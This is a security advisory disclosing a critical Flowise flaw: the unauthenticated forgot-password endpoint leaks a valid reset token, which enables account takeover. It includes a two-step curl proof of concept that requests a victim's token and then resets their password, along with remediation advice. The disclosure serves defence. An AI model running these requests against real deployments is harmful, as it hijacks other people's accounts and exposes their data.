GHSA-wgpv-6j63-x5ph
GitHub Security Advisory
Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover
Advisory Details
### Summary
The `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**.
This vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API.
**CVSS v3.1 Base Score:** **9.8 (Critical)**
**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
---
### Details
* The endpoint `/api/v1/account/forgot-password` accepts an email address as input.
* Instead of only sending a reset email, the API **responds directly with sensitive user details**, including:
  * User ID, name, email, hashed credential, status, timestamps.
  * **A valid `tempToken` and its expiry**, which is intended for password reset.
* This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction.
* Exploitation requires only the victim’s email address, which is often guessable or discoverable.
* Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover.
This effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email.
---
### PoC
1. **Request a reset token for the victim**
```bash
curl -i -X POST https://<target>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
```
**Response (201 Created):**
```json
{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<[email protected]>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}
```
2. **Use the exposed `tempToken` to reset the password**
```bash
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
    "user": {
      "email": "<[email protected]>",
      "tempToken": "<redacted-tempToken>",
      "password": "NewSecurePassword123!"
    }
  }'
```
**Expected Result:** `200 OK`
The victim’s account password is reset, allowing full login.
---
### Impact
* **Type:** Authentication bypass / Insecure direct object exposure.
* **Impact:**
  * Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
  * Applies to **both Flowise Cloud and locally hosted/self-managed deployments**.
  * Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
  * High likelihood of exploitation since no prior access or user interaction is required.
---
### Recommended Remediation
* **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
* Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration.
* Treat the `tempToken` as a credential: generate it from a cryptographically secure random source, make it single-use and short-lived, bind it to the account it was issued for, and accept it only through the reset flow that the emailed link initiates, never from a value the API itself handed out.
* Apply the same fixes to **both cloud and self-hosted/local deployments**.
* Log and monitor password reset requests for suspicious activity.
* Consider multi-factor verification for sensitive accounts.
---
⚠️ This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**.
---
Dataset
Data from GitHub Advisory Database. This information is provided for research and educational purposes.